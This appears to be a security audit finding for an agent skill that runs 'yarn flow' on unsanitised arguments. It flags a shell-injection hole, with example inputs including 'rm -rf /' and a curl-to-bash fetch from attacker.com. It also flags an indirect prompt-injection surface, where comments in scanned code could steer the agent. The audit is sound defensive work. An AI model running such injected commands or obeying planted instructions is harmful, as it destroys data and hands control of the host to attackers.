The Agent Skills Directory

[COMMAND_EXECUTION] (HIGH): The instruction yarn flow $ARGUMENTS is vulnerable to shell injection. Because $ARGUMENTS is interpolated directly into a shell command without sanitization, an attacker could provide input like ; rm -rf / or ; curl http://attacker.com/exploit | bash to execute arbitrary code on the host system.\n- [PROMPT_INJECTION] (HIGH): The skill identifies a high-severity Indirect Prompt Injection surface (Category 8). 1. Ingestion points: The skill ingests untrusted source code and user-provided arguments to perform type checking. 2. Boundary markers: None are present to delimit untrusted data from the agent's instructions. 3. Capability inventory: The skill has the capability to execute shell commands via yarn. 4. Sanitization: There is no escaping or validation of the input arguments or the content of the files being processed. This allows malicious instructions embedded in code comments or arguments to potentially control the agent's actions.

flow